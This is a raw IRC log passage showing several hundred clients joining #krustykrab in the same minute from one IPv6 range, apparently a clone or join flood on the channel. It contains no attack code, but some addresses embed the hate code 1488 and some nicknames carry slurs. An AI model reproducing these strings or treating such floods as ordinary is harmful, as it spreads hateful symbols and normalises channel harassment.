[~ixi@2604:180:2:12cc:0:deaf:dead:fed] has joined #krustykrab 00:19 -!- morphas| [~candida1@2604:180:2:12cc:0:deaf:dead:fed] has joined #krustykrab 00:19 -!- ced [~amdman@2604:180:2:12cc::ef:fed] has joined #krustykrab 00:19 -!- cyg [~wwest@2604:180:2:12cc::ef:fed] has joined #krustykrab 00:19 -!- giusep [~belgianu@2604:180:2:12cc:babe:cab:bed:fed] has joined #krustykrab 00:19 -!- SERKAN [~maxinux@2604:180:2:12cc::1048] has joined #krustykrab 00:19 -!- michel [~rzv@2604:180:2:12cc:babe:cab:bed:fed] has joined #krustykrab 00:19 -!- ghos [~reppy@2604:180:2:12cc:0:deaf:babe:fee] has joined #krustykrab 00:19 -!- giulione [~rsampaio@2604:180:2:12cc:0:deaf:babe:fee] has joined #krustykrab 00:19 -!- docst [~skip`@2604:180:2:12cc::1048] has joined #krustykrab 00:19 -!- margar [~Sen}{}{{@2604:180:2:12cc::d] has joined #krustykrab 00:19 -!- son [~cata3m@2604:180:2:12cc:f:e:d:0] has joined #krustykrab 00:19 -!- ryoka [~sut666@2604:180:2:12cc:f:e:d:0] has joined #krustykrab 00:19 -!- c-0-r [~Castella@2604:180:2:12cc::c] has joined #krustykrab 00:19 -!- operhe [~kbu11dud@2604:180:2:12cc:9:2:5:2] has joined #krustykrab 00:19 -!- begum-sa [~loudnpun@2604:180:2:12cc:feed:deaf:fed:babe] has joined #krustykrab 00:19 -!- juli [~NuMaivii@2604:180:2:12cc:feed:deaf:fed:babe] has joined #krustykrab 00:19 -!- khergo [~fhkask@2604:180:2:12cc::babe:bed] has joined #krustykrab 00:19 -!- |attil [~blondele@2604:180:2:12cc::babe:bed] has joined #krustykrab 00:19 -!- depechem [~Tomy^bye@2604:180:2:12cc:666:420:1488:911] has joined #krustykrab 00:19 -!- witc [~pk@2604:180:2:12cc:666:420:1488:911] has joined #krustykrab 00:19 -!- acidfla [~esjeke@2604:180:2:12cc:f:e:e:ed] has joined #krustykrab 00:19 -!- campanu [~booba@2604:180:2:12cc:f:e:e:ed] has joined #krustykrab 00:19 -!- nyx [~hitokiri@2604:180:2:12cc::b] has joined #krustykrab 00:19 -!- agat [~dido^@2604:180:2:12cc::4917] has joined #krustykrab 00:19 -!- mr_karac [~chazbo70@2604:180:2:12cc::b] has joined #krustykrab 00:19 -!- guest895 [~LoeYou}{@2604:180:2:12cc::4917] has joined #krustykrab 00:19 -!- fol [~g|away@2604:180:2:12cc:4198:19:1083:5811] has joined #krustykrab 00:19 -!- rub [~sherrif2@2604:180:2:12cc:4198:19:1083:5811] has joined #krustykrab 00:19 -!- voglioun [~murda@2604:180:2:12cc::fade:d] has joined #krustykrab 00:19 -!- safedbac [~qibgtn@2604:180:2:12cc::fade:d] has joined #krustykrab 00:19 -!- safina_k [~razon]@2604:180:2:12cc::bff] has joined #krustykrab 00:19 -!- [rocke [~dia26@2604:180:2:12cc:1519:ba41:a91d:9be] has joined #krustykrab 00:19 -!- billyb [~chazbo70@2604:180:2:12cc:1519:ba41:a91d:9be] has joined #krustykrab 00:19 -!- kim18f [~troschet@2604:180:2:12cc::bff] has joined #krustykrab 00:19 -!- lorfi [~vlautz25@2604:180:2:12cc:6425:5801:5670:1502] has joined #krustykrab 00:19 -!- t4k4m0 [~piggy@2604:180:2:12cc:6425:5801:5670:1502] has joined #krustykrab 00:19 -!- zmijc [~Puturosu@2604:180:2:12cc:cccc:cccc:cccc:cccc] has quit [Excess Flood] 00:19 -!- mastif [~sers@2604:180:2:12cc::bad:420] has joined #krustykrab 00:19 -!- IAMCANAD [~svcpdl@2604:180:2:12cc::bad:666] has joined #krustykrab 00:19 -!- gilm0 [~SAMI28@2604:180:2:12cc::bad:420] has joined #krustykrab 00:19 -!- dizz [~xender--@2604:180:2:12cc::bad:666] has joined #krustykrab 00:19 -!- vampy [~fastazph@2604:180:2:12cc::deaf:fed] has joined #krustykrab 00:19 -!- Zor [~Sen}{}{{@2604:180:2:12cc::deaf:fed] has joined #krustykrab 00:19 -!- gattu [~xirooy@2604:180:2:12cc::fed:420] has joined #krustykrab 00:19 -!- giove [~cipri_@2604:180:2:12cc::fed:420] has joined #krustykrab 00:19 -!- peg [~glrjmi@2604:180:2:12cc:4353:6547:8671:2313] has joined #krustykrab 00:19 -!- shar [~tygroayk@2604:180:2:12cc:4353:6547:8671:2313] has joined #krustykrab 00:19 -!- sfon [~CeFaem@2604:180:2:12cc::a] has joined #krustykrab 00:19 -!- dur [~Petrodav@2604:180:2:12cc::a] has joined #krustykrab 00:19 -!- channel- [~gamelias@2604:180:2:12cc:0:babe:b00b:bac] has joined #krustykrab 00:19 -!- the_ga [~hojo@2604:180:2:12cc:0:babe:b00b:bac] has joined #krustykrab 00:19 -!- iban [~genok|bn@2604:180:2:12cc::b420:949] has joined #krustykrab 00:19 -!- `pluton [~angelgir@2604:180:2:12cc::b420:949] has joined #krustykrab 00:19 -!- jonnolo [~KeeMeAwa@2604:180:2:12cc::bad:1488] has joined #krustykrab 00:19 -!- deepr [~Alcatel@2604:180:2:12cc::bad:1488] has joined #krustykrab 00:19 -!- uyg [~mark_hom@2604:180:2:12cc::beef:cab] has joined #krustykrab 00:19 -!- w [~codrut}{@2604:180:2:12cc:bac:2:da:ef] has joined #krustykrab 00:19 -!- da-gambl [~white@2604:180:2:12cc:bac:2:da:ef] has joined #krustykrab 00:19 -!- teste [~cezara_4@2604:180:2:12cc:8:4:2:7] has joined #krustykrab 00:19 -!- _-thoola [~bog_gbtz@2604:180:2:12cc:8:4:2:7] has joined #krustykrab 00:19 -!- ESMER [~jecch@2604:180:2:12cc::beef:cab] has joined #krustykrab 00:19 -!- ][lorddr [~Ender_@2604:180:2:12cc:0:9:1:1] has joined #krustykrab 00:19 -!- bastar [~yaceek@2604:180:2:12cc:0:9:1:1] has joined #krustykrab 00:19 -!- desdino [~i_deltro@2604:180:2:12cc::c0cc:babe] has joined #krustykrab 00:19 -!- c4tt [~janxster@2604:180:2:12cc:0:bac:2:da] has joined #krustykrab 00:19 -!- airpo [~THE_DOT2@2604:180:2:12cc:0:bad:c0c:babe] has joined #krustykrab 00:19 -!- f|ow [~gunnz@2604:180:2:12cc:0:bac:2:da] has joined #krustykrab 00:19 -!- guest555 [~hirvi@2604:180:2:12cc:0:f:a:d] has joined #krustykrab 00:19 -!- Sandym [~gooner@2604:180:2:12cc:0:f:a:d] has joined #krustykrab 00:19 -!- racha [~sagona04@2604:180:2:12cc:0:bad:c0c:babe] has joined #krustykrab 00:19 -!- viu [~Tomy^bye@2604:180:2:12cc:9031:562:7363:1516] has joined #krustykrab 00:19 -!- sinfo [~trooty@2604:180:2:12cc:9031:562:7363:1516] has joined #krustykrab 00:19 -!- _spyro_o [~ZoRRo-@2604:180:2:12cc::fed:dead] has joined #krustykrab 00:19 -!- ibi [~candida1@2604:180:2:12cc::fed:dead] has joined #krustykrab 00:19 -!- glici [~albanach@2604:180:2:12cc:9162:589:1988:1776] has joined #krustykrab 00:19 -!- infolud [~jonel39@2604:180:2:12cc:1234:5678:9012:3456] has joined #krustykrab 00:19 -!- serd [~stonecol@2604:180:2:12cc:1234:5678:9012:3456] has joined #krustykrab 00:19 -!- kololu [~LaLoU@2604:180:2:12cc::c0cc:babe] has joined #krustykrab 00:19 -!- Skyha [~^mafia^@2604:180:2:12cc:1:3:3:7] has joined #krustykrab 00:19 -!- jarre [~frodo@2604:180:2:12cc:0:4:2:0] has joined #krustykrab 00:19 -!- urinste [~ReAL@2604:180:2:12cc:f:a:d:e] has joined #krustykrab 00:19 -!- nesto [~EDDY24@2604:180:2:12cc:1:3:3:7] has joined #krustykrab 00:19 -!- angelmo [~floriana@2604:180:2:12cc:f:a:d:e] has joined #krustykrab 00:19 -!- animam [~logan998@2604:180:2:12cc:0:4:2:0] has joined #krustykrab 00:19 -!- exta [~glimpse@2604:180:2:12cc:d00f:b00b:f00d:fade] has joined #krustykrab 00:19 -!- highw [~tput@2604:180:2:12cc:9162:589:1988:1776] has joined #krustykrab 00:19 -!- mcc [~narutoz@2604:180:2:12cc:f00d:f00d:d00f:b00f] has joined #krustykrab 00:19 -!- haka [~lorraine@2604:180:2:12cc:0:feed:deed:dead] has joined #krustykrab 00:19 -!- camer [~kandi@2604:180:2:12cc:d00f:b00b:f00d:fade] has joined #krustykrab 00:19 -!- _mons [~chau@2604:180:2:12cc:f00d:f00d:d00f:b00f] has joined #krustykrab 00:19 -!- teamextr [~1]jg@2604:180:2:12cc::1928:5111] has joined #krustykrab 00:19 -!- saN [~zero_odd@2604:180:2:12cc:0:feed:deed:dead] has joined #krustykrab 00:19 -!- th0rst [~prosteti@2604:180:2:12cc:abdf:abec:ffea:abed] has joined #krustykrab 00:19 -!- henr [~crak@2604:180:2:12cc::fade] has joined #krustykrab 00:19 -!- izmir [~luv2skat@2604:180:2:12cc::1928:5111] has joined #krustykrab 00:19 -!- temporar [~Coenecta@2604:180:2:12cc::fade] has joined #krustykrab 00:19 -!- bookasha [~floriana@2604:180:2:12cc::feca:1] has joined #krustykrab 00:19 -!- mary`z [~Romantic@2604:180:2:12cc:5156:1245:1515:8795] has joined #krustykrab 00:19 -!- _somm [~kadu|ceu@2604:180:2:12cc:4315:1618:9178:5108] has joined #krustykrab 00:19 -!- keanu [~steve32q@2604:180:2:12cc::666] has joined #krustykrab 00:19 -!- bianchi [~lavinia3@2604:180:2:12cc:abdf:abec:ffea:abed] has joined #krustykrab 00:19 -!- expr [~nightfal@2604:180:2:12cc:4315:1618:9178:5108] has joined #krustykrab 00:19 -!- ^haker [~MiciParo@2604:180:2:12cc::420] has joined #krustykrab 00:19 -!- is0m0r [~SAMI28@2604:180:2:12cc::feca:1] has joined #krustykrab 00:19 -!- vlad [~OriktrFi@2604:180:2:12cc::420] has joined #krustykrab 00:19 -!- prince-c [~lo@2604:180:2:12cc:0:1337:1488:666] has joined #krustykrab 00:19 -!- yaq [~frixus@2604:180:2:12cc::1337] has joined #krustykrab 00:19 -!- jackspar [~Iuliu@2604:180:2:12cc:5156:1245:1515:8795] has joined #krustykrab 00:19 -!- aky`o [~Cfc|xAv1@2604:180:2:12cc::1337] has joined #krustykrab 00:19 -!- ber [~CluJuL@2604:180:2:12cc::beef:bacc] has joined #krustykrab 00:19 -!- crazyki [~lo@2604:180:2:12cc::beef:bacc] has joined #krustykrab 00:19 -!- Nygi [~nixhunte@2604:180:2:12cc:0:1337:1488:666] has joined #krustykrab 00:19 -!- natureo [~Jumpy27@2604:180:2:12cc:666:1488:420:bbbb] has joined #krustykrab 00:19 -!- a020b [~logan998@2604:180:2:12cc:666:1488:420:bbbb] has joined #krustykrab 00:19 -!- curt [~azul_leo@2604:180:2:12cc:1:3:5:2] has joined #krustykrab 00:19 -!- TUTUKLUY [~john@2604:180:2:12cc:1:3:5:2] has joined #krustykrab 00:19 -!- der_al [~Largaret@2604:180:2:12cc::1488] has joined #krustykrab 00:19 -!- ank-30 [~raydog@2604:180:2:12cc::1488] has joined #krustykrab 00:19 -!- [s]trik [~lasso|qt@2604:180:2:12cc::dead] has joined #krustykrab 00:19 -!- passbel [~anyk@2604:180:2:12cc:1488:1488:1488:4151] has joined #krustykrab 00:19 -!- federic [~rickbhar@2604:180:2:12cc:1488:1488:1488:4151] has joined #krustykrab 00:19 -!- laila-sh [~derlangs@2604:180:2:12cc::b420:999] has joined #krustykrab 00:19 -!- a|i [~cezara_4@2604:180:2:12cc::bad:91] has joined #krustykrab 00:19 -!- geri-s [~ShAdOwV3@2604:180:2:12cc::bad:91] has joined #krustykrab 00:19 -!- smart`n` [~addicted@2604:180:2:12cc::b420:999] has joined #krustykrab 00:19 -!- ging [~Shere@2604:180:2:12cc:1:2:3:4] has joined #krustykrab 00:19 -!- _guest12 [~grenn@2604:180:2:12cc::fed:bed] has joined #krustykrab 00:19 -!- binba [~firebird@2604:180:2:12cc::fed:bed] has joined #krustykrab 00:19 -!- _freefal [~sc4rf4ce@2604:180:2:12cc:1:2:3:4] has joined #krustykrab 00:19 -!- E| [~mikedeew@2604:180:2:12cc::b00f] has joined #krustykrab 00:19 -!- danil [~PIT_BOOL@2604:180:2:12cc:b:a:b:e] has joined #krustykrab 00:19 -!- Bes [~leaspn@2604:180:2:12cc::12] has joined #krustykrab 00:19 -!- jareck [~xxxlord3@2604:180:2:12cc:b:a:b:e] has joined #krustykrab 00:19 -!- cran [~djp@2604:180:2:12cc::12] has joined #krustykrab 00:19 -!- chest [~jaydenyo@2604:180:2:12cc::6667:1fc] has joined #krustykrab 00:19 -!- vascoros [~bog_gbtz@2604:180:2:12cc::5161] has joined #krustykrab 00:19 -!- yo [~piggy@2604:180:2:12cc::dead] has joined #krustykrab 00:19 -!- zai [~kingjack@2604:180:2:12cc:c:a:b:e] has joined #krustykrab 00:19 -!- kakano [~gigolo19@2604:180:2:12cc:c:a:b:e] has joined #krustykrab 00:19 -!- viol3t [~angelgir@2604:180:2:12cc::666:babe] has joined #krustykrab 00:19 -!- SaDIkaEl [~linuxr0x@2604:180:2:12cc:feed:babe:beef:0] has joined #krustykrab 00:19 -!- na [~AmTermin@2604:180:2:12cc:2222:2222:2222:222] has joined #krustykrab 00:19 -!- edg [~Boxerita@2604:180:2:12cc:feed:babe:beef:0] has joined #krustykrab 00:19 -!- reli [~jonel39@2604:180:2:12cc::666:babe] has joined #krustykrab 00:19 -!- akuf [~kimsavag@2604:180:2:12cc:2222:2222:2222:222] has joined #krustykrab 00:19 -!- rapt [~pgz-aha@2604:180:2:12cc::5161] has joined #krustykrab 00:19 -!- samra`ar [~aust|n31@2604:180:2:12cc:0:f33d:fe3d:feed] has joined #krustykrab 00:19 -!- dragu [~rz_alina@2604:180:2:12cc::fee] has joined #krustykrab 00:19 -!- loserp [~annusha@2604:180:2:12cc::fee] has joined #krustykrab 00:19 -!- cheev [~kulet562@2604:180:2:12cc::1791] has joined #krustykrab 00:19 -!- cristj [~jurel@2604:180:2:12cc::e] has joined #krustykrab 00:19 -!- ftrTrun [~leraldo@2604:180:2:12cc:babc:abef:bafe:fea2] has joined #krustykrab 00:19 -!- net-spl [~iooaol@2604:180:2:12cc::c0de] has joined #krustykrab 00:19 -!- hatl [~dalmi1@2604:180:2:12cc:0:f33d:fe3d:feed] has joined #krustykrab 00:19 -!- rul [~Dragdim@2604:180:2:12cc::53c4] has joined #krustykrab 00:19 -!- bc- [~mrorgani@2604:180:2:12cc::53c4] has joined #krustykrab 00:19 -!- dia`mir [~kd18@2604:180:2:12cc::e] has joined #krustykrab 00:19 -!- dr4g [~KR|NA@2604:180:2:12cc::1791] has joined #krustykrab 00:19 -!- cheat [~excalaba@2604:180:2:12cc:1048:1927:1075:2917] has joined #krustykrab 00:19 -!- cinghi4 [~Din`Ou@2604:180:2:12cc:0:fed:f00d:0] has joined #krustykrab 00:19 -!- ishr [~presiden@2604:180:2:12cc:1048:1927:1075:2917] has joined #krustykrab 00:19 -!- susan-la [~luv2skat@2604:180:2:12cc:0:fed:f00d:0] has joined #krustykrab 00:19 -!- bagg [~lorraine@2604:180:2:12cc:0:deaf:dead:fed] has joined #krustykrab 00:19 -!- ^TwInN [~CuvanTUr@2604:180:2:12cc:5161:132:5478:9820] has joined #krustykrab 00:19 -!- romantic [~Sphere@2604:180:2:12cc:5161:132:5478:9820] has joined #krustykrab 00:19 -!- `ade [~LaU-sMeN@2604:180:2:12cc::d] has joined #krustykrab 00:19 -!- BarbieGi [~jjj@2604:180:2:12cc::ef:fed] has joined #krustykrab 00:19 -!- Politik [~rz_alina@2604:180:2:12cc:babe:cab:bed:fed] has joined #krustykrab 00:19 -!- zozzo [~FiXiON@2604:180:2:12cc:babe:cab:bed:fed] has joined #krustykrab 00:19 -!- bigbr [~kingjack@2604:180:2:12cc::1048] has joined #krustykrab 00:19 -!- charlieb [~tygroayk@2604:180:2:12cc:9:2:5:2] has joined #krustykrab 00:19 -!- pressio [~angelgir@2604:180:2:12cc::1048] has joined #krustykrab 00:19 -!- yourna [~sssabuc@2604:180:2:12cc:0:deaf:babe:fee] has joined #krustykrab 00:19 -!- hb [~k1piee@2604:180:2:12cc:0:deaf:dead:fed] has joined #krustykrab 00:19 -!- ep [~juuco@2604:180:2:12cc:feed:deaf:fed:babe] has joined #krustykrab 00:19 -!- jattared [~el_bv@2604:180:2:12cc::ef:fed] has joined #krustykrab 00:19 -!- steppenk [~el_bv@2604:180:2:12cc::c] has joined #krustykrab 00:19 -!- aky`au [~perr@2604:180:2:12cc::babe:bed] has joined #krustykrab 00:19 -!- makda [~tataie@2604:180:2:12cc::d] has joined #krustykrab 00:19 -!- [denver- [~Buburuza@2604:180:2:12cc::c] has joined #krustykrab 00:19 -!- inzen [~ro121@2604:180:2:12cc:f:e:d:0] has joined #krustykrab 00:19 -!- love-val [~jecch@2604:180:2:12cc:f:e:d:0] has joined #krustykrab 00:19 -!- biba`un` [~sssabuc@2604:180:2:12cc:0:deaf:babe:fee] has joined #krustykrab 00:19 -!- han [~g|away@2604:180:2:12cc::babe:bed] has joined #krustykrab 00:19 -!- cansuu [~guppy_mi@2604:180:2:12cc:666:420:1488:911] has joined #krustykrab 00:19 -!- StagN [~galeata@2604:180:2:12cc:666:420:1488:911] has joined #krustykrab 00:19 -!- _-goriar [~Liguri@2604:180:2:12cc::fade:d] has joined #krustykrab 00:19 -!- CheekyG [~Puiiei@2604:180:2:12cc:9:2:5:2] has joined #krustykrab 00:19 -!- york_thi [~yqbsrg@2604:180:2:12cc:1519:ba41:a91d:9be] has joined #krustykrab 00:19 -!- dlvlnki [~anyk@2604:180:2:12cc::b] has joined #krustykrab 00:19 -!- Availabl [~quork@2604:180:2:12cc:feed:deaf:fed:babe] has joined #krustykrab 00:19 -!- Tota|Ev [~lucy19@2604:180:2:12cc::4917] has joined #krustykrab 00:19 -!- lamer [~annusha@2604:180:2:12cc:6425:5801:5670:1502] has joined #krustykrab 00:19 -!- |ndoch| [~BunicPer@2604:180:2:12cc:4198:19:1083:5811] has joined #krustykrab 00:19 -!- spi [~ClUjAn3L@2604:180:2:12cc:6425:5801:5670:1502] has joined #krustykrab 00:19 -!- k4 [~fata^rea@2604:180:2:12cc::bad:420] has joined #krustykrab 00:19 -!- krak [~redgreen@2604:180:2:12cc:f:e:e:ed] has joined #krustykrab 00:19 -!- junfl [~gatorbob@2604:180:2:12cc:f:e:e:ed] has joined #krustykrab 00:19 -!- oceani [~anyk@2604:180:2:12cc::bad:666] has joined #krustykrab 00:19 -!- Donjua [~giovy@2604:180:2:12cc::b] has joined #krustykrab 00:19 -!- capitan [~x-script@2604:180:2:12cc:1519:ba41:a91d:9be] has joined #krustykrab 00:19 -!- ^f4lk [~Cubutori@2604:180:2:12cc::bff] has joined #krustykrab 00:19 -!- cestm [~Repedeee@2604:180:2:12cc::4917] has joined #krustykrab 00:19 -!- love-to- [~inefabil@2604:180:2:12cc::deaf:fed] has joined #krustykrab 00:19 -!- ADRESims [~wetzz@2604:180:2:12cc:4198:19:1083:5811] has joined #krustykrab 00:19 -!- Galldri [~cold13@2604:180:2:12cc:4353:6547:8671:2313] has joined #krustykrab 00:19 -!- nop`o [~xender--@2604:180:2:12cc::fade:d] has joined #krustykrab 00:19 -!- [_rose [~lobo`@2604:180:2:12cc::fed:420] has joined #krustykrab 00:19 -!- Hm [~ViatzaAl@2604:180:2:12cc::fed:420] has joined #krustykrab 00:19 -!- binta [~uSi31@2604:180:2:12cc::bff] has joined #krustykrab 00:19 -!- takt [~movboy@2604:180:2:12cc::b420:949] has joined #krustykrab 00:19 -!- borisbre [~ClUjAn3L@2604:180:2:12cc::deaf:fed] has joined #krustykrab 00:19 -!- waf [~ErhnaM_p@2604:180:2:12cc::bad:1488] has joined #krustykrab 00:19 -!- sti [~vBx@2604:180:2:12cc:4353:6547:8671:2313] has joined #krustykrab 00:19 -!- stylish^ [~KR|NA@2604:180:2:12cc::beef:cab] has joined #krustykrab 00:19 -!- ch [~Just-Par@2604:180:2:12cc::bad:420] has joined #krustykrab 00:19 -!- netbomb [~limb0@2604:180:2:12cc::beef:cab] has joined #krustykrab 00:19 -!- gioiadiv [~nyhusern@2604:180:2:12cc::a] has joined #krustykrab 00:19 -!- ]g|o|{ [~THE_DOT2@2604:180:2:12cc:bac:2:da:ef] has joined #krustykrab 00:19 -!- diavolet [~hirvi@2604:180:2:12cc:bac:2:da:ef] has joined #krustykrab 00:19 -!- KOCE [~jewmugg@2604:180:2:12cc::a] has joined #krustykrab 00:19 -!- guest439 [~ElLAlaja@2604:180:2:12cc::bad:666] has joined #krustykrab 00:19 -!- v4cc4 [~demie@2604:180:2:12cc:0:babe:b00b:bac] has joined #krustykrab 00:19 -!- hexaaaaa [~Motard-@2604:180:2:12cc:0:babe:b00b:bac] has joined #krustykrab 00:19 -!- vort [~bobek@2604:180:2:12cc:0:9:1:1] has joined #krustykrab 00:19 -!- `superma [~Raluca}{@2604:180:2:12cc::b00f] has joined #krustykrab 00:19 -!- maha-uja [~AllleX}{@2604:180:2:12cc::deaf:babe] has joined #krustykrab 00:19 -!- Fifthco [~GliMer_E@2604:180:2:12cc:f::d] has joined #krustykrab 00:19 -!- leve [~akux@2604:180:2:12cc:f::d] has joined #krustykrab 00:19 -!- hellmast [~perr@2604:180:2:12cc::deaf:babe] has joined #krustykrab 00:19 -!- hilla [~pseudoni@2604:180:2:12cc::6667:1fc] has joined #krustykrab 00:19 -!- ist [~frn-baby@2604:180:2:12cc::feed] has joined #krustykrab 00:19 -!- cameliar [~hisuiibm@2604:180:2:12cc::abcd:ef] has joined #krustykrab 00:19 -!- _300_o [~theneedy@2604:180:2:12cc::feed] has joined #krustykrab 00:19 -!- niko_1o [~xkillswi@2604:180:2:12cc::abcd:ef] has joined #krustykrab 00:19 -!- sampe [~ceesee@2604:180:2:12cc::151:b00f] has joined #krustykrab 00:19 -!- t3x [~fata^rea@2604:180:2:12cc:fade:bacc:babe:f00d] has joined #krustykrab 00:19 -!- dill [~ShAdOwV3@2604:180:2:12cc::f1b:f0b] has joined #krustykrab 00:19 -!- TU-PA [~Wiseguy@2604:180:2:12cc:fade:bacc:babe:f00d] has joined #krustykrab 00:19 -!- Ayl [~suckafre@2604:180:2:12cc:ef:ef:ef:ef] has joined #krustykrab 00:19 -!- melon [~Viorica4@2604:180:2:12cc::f1b:f0b] has joined #krustykrab 00:19 -!- `gi|me [~mski4@2604:180:2:12cc:1111:1111:1111:1111] has joined #krustykrab 00:19 -!- king^of^ [~bladeado@2604:180:2:12cc:ef:ef:ef:ef] has joined #krustykrab 00:19 -!- anti|vir [~melager3@2604:180:2:12cc:3333:3333:3333:3333] has joined #krustykrab 00:19 -!- irss [~hulken@2604:180:2:12cc:3333:3333:3333:3333] has joined #krustykrab 00:19 -!- radiofol [~walc@2604:180:2:12cc:1111:1111:1111:1111] has joined #krustykrab 00:19 -!- pp [~T0flea@2604:180:2:12cc:4444:4444:4444:4444] has joined #krustykrab 00:19 -!- eunu [~lexia_@2604:180:2:12cc:5555:5555:5555:5555] has joined #krustykrab 00:19 -!- minite [~tooty@2604:180:2:12cc:4444:4444:4444:4444] has joined #krustykrab 00:19 -!- z_m [~noleafcl@2604:180:2:12cc::151:b00f] has joined #krustykrab 00:19 -!- Eva-Unit [~conjurer@2604:180:2:12cc:6666:6666:6666:6666] has joined #krustykrab 00:19 -!- anton [~JolaEins@2604:180:2:12cc:5555:5555:5555:5555] has joined #krustykrab 00:19 -!- badwor [~iceman@2604:180:2:12cc:7777:7777:7777:7777] has joined #krustykrab 00:19 -!- arapcin [~presiden@2604:180:2:12cc:7777:7777:7777:7777] has joined #krustykrab 00:19 -!- NOTICEAB [~perr@2604:180:2:12cc:6666:6666:6666:6666] has joined #krustykrab 00:19 -!- Roberto [~Wilditte@2604:180:2:12cc:8888:8888:8888:8888] has joined #krustykrab 00:19 -!- theque [~Sen}{}{{@2604:180:2:12cc:9999:9999:9999:9999] has joined #krustykrab 00:19 -!- summerja [~eltoni_2@2604:180:2:12cc:aaaa:aaaa:aaaa:aaaa] has joined #krustykrab 00:19 -!- silv [~oioioii@2604:180:2:12cc:bbbb:bbbb:bbbb:bbbb] has joined #krustykrab 00:19 -!- ivon [~frv@2604:180:2:12cc:8888:8888:8888:8888] has joined #krustykrab 00:19 -!- asl [~cliksta@2604:180:2:12cc:aaaa:aaaa:aaaa:aaaa] has joined #krustykrab 00:19 -!- ^^rossel [~outkast@2604:180:2:12cc:9999:9999:9999:9999] has joined #krustykrab 00:19 -!- chir [~anryana@2604:180:2:12cc:bbbb:bbbb:bbbb:bbbb] has joined #krustykrab 00:19 -!- DeL [~darkjen@2604:180:2:12cc:eeee:eeee:eeee:eeee] has joined #krustykrab 00:19 -!- rafa [~idjut@2604:180:2:12cc:cccc:cccc:cccc:cccc] has joined #krustykrab 00:19 -!- Grumb [~jimi@2604:180:2:12cc:cccc:cccc:cccc:cccc] has joined #krustykrab 00:19 -!- wow_ker [~pure_agn@2604:180:2:12cc::bad:1488] has joined #krustykrab 00:19 -!- ruff-ne [~lau_tm@2604:180:2:12cc:0:bac:2:da] has joined #krustykrab 00:19 -!- fuyu [~Tzealau@2604:180:2:12cc::b420:949] has joined #krustykrab 00:19 -!- manow [~bobek@2604:180:2:12cc:0:9:1:1] has joined #krustykrab 00:19 -!- Oguzh [~Sphere@2604:180:2:12cc::c0cc:babe] has joined #krustykrab 00:19 -!- ^stell [~Taleta@2604:180:2:12cc::c0cc:babe] has joined #krustykrab 00:19 -!- Greeney [~kel@2604:180:2:12cc:0:bad:c0c:babe] has joined #krustykrab 00:19 -!- _super_g [~}{BOSS@2604:180:2:12cc:9162:589:1988:1776] has joined #krustykrab 00:19 -!- Fallm [~hochler@2604:180:2:12cc:8:4:2:7] has joined #krustykrab 00:19 -!- aracel [~ScrurtaV@2604:180:2:12cc:0:f:a:d] has joined #krustykrab 00:19 -!- symfon [~angel{_}@2604:180:2:12cc:1234:5678:9012:3456] has joined #krustykrab 00:19 -!- jasml [~sp4c3@2604:180:2:12cc:8:4:2:7] has joined #krustykrab 00:19 -!- Aldo [~HoboFTP@2604:180:2:12cc:1234:5678:9012:3456] has joined #krustykrab 00:19 -!- isab [~quork@2604:180:2:12cc:9031:562:7363:1516] has joined #krustykrab 00:19 -!- ynnos [~vwebo@2604:180:2:12cc:0:4:2:0] has joined #krustykrab 00:19 -!- special [~piotr@2604:180:2:12cc:0:bac:2:da] has joined #krustykrab 00:19 -!- DarK^Lt [~sharkfin@2604:180:2:12cc:f:a:d:e] has joined #krustykrab 00:19 -!- izw [~body2006@2604:180:2:12cc:0:bad:c0c:babe] has joined #krustykrab 00:19 -!- game^ov [~w3c70r`@2604:180:2:12cc:9162:589:1988:1776] has joined #krustykrab 00:19 -!- jama [~PindeMus@2604:180:2:12cc::1928:5111] has joined #krustykrab 00:19 -!- sall [~AparatAu@2604:180:2:12cc:0:f:a:d] has joined #krustykrab 00:19 -!- pinesna [~runningm@2604:180:2:12cc:1:3:3:7] has joined #krustykrab 00:19 -!- wysokil [~c0caine@2604:180:2:12cc:1:3:3:7] has joined #krustykrab 00:19 -!- siracus [~ktpdnp@2604:180:2:12cc::fade] has joined #krustykrab 00:19 -!- sam-sam- [~Dj`STR3S@2604:180:2:12cc::fade] has joined #krustykrab 00:19 -!- DONETH [~candida1@2604:180:2:12cc:9031:562:7363:1516] has joined #krustykrab 00:19 -!- astri [~xender--@2604:180:2:12cc::fed:dead] has joined #krustykrab 00:19 -!- nedr [~l-c@2604:180:2:12cc:0:4:2:0] has joined #krustykrab 00:19 -!- stonefa [~balba_@2604:180:2:12cc::fed:dead] has joined #krustykrab 00:19 -!- chawd [~Stefano`@2604:180:2:12cc::feca:1] has joined #krustykrab 00:19 -!- _huch [~kiax@2604:180:2:12cc:f00d:f00d:d00f:b00f] has joined #krustykrab 00:19 -!- crev [~lucy19@2604:180:2:12cc:f00d:f00d:d00f:b00f] has joined #krustykrab 00:19 -!- dora [~Just-Par@2604:180:2:12cc:d00f:b00b:f00d:fade] has joined #krustykrab 00:19 -!- nigg [~c0ker0x@2604:180:2:12cc:d00f:b00b:f00d:fade] has joined #krustykrab 00:19 -!- madedd [~yddmbl@2604:180:2:12cc:0:feed:deed:dead] has joined #krustykrab 00:19 -!- scew-u- [~sharkfin@2604:180:2:12cc::1928:5111] has joined #krustykrab 00:19 -!- dedicat [~Iuliu@2604:180:2:12cc:abdf:abec:ffea:abed] has joined #krustykrab 00:19 -!- sna [~sag3tato@2604:180:2:12cc:0:1337:1488:666] has joined #krustykrab 00:19 -!- teags [~dia26@2604:180:2:12cc:f:a:d:e] has joined #krustykrab 00:19 -!- spitl [~ejanime@2604:180:2:12cc:1:3:5:2] has joined #krustykrab 00:19 -!- prov [~testenn@2604:180:2:12cc:5156:1245:1515:8795] has joined #krustykrab 00:19 -!- voxpopu [~wargon@2604:180:2:12cc:5156:1245:1515:8795] has joined #krustykrab 00:19 -!- whow [~creatza^@2604:180:2:12cc:4315:1618:9178:5108] has joined #krustykrab 00:19 -!- darklov [~steptof@2604:180:2:12cc::666] has joined #krustykrab 00:19 -!- muam [~Apoph|s@2604:180:2:12cc:4315:1618:9178:5108] has joined #krustykrab 00:19 -!- funkn [~Sean}{}{@2604:180:2:12cc:0:feed:deed:dead] has joined #krustykrab 00:19 -!- melon`mi [~akux@2604:180:2:12cc::1337] has joined #krustykrab 00:19 -!- ano [~IC-T-25@2604:180:2:12cc::b420:999] has joined #krustykrab 00:19 -!- os [~floriana@2604:180:2:12cc:abdf:abec:ffea:abed] has joined #krustykrab 00:19 -!- JeLop [~profx@2604:180:2:12cc::b420:999] has joined #krustykrab 00:19 -!- mi [~yeyayeah@2604:180:2:12cc::feca:1] has joined #krustykrab 00:19 -!- drave 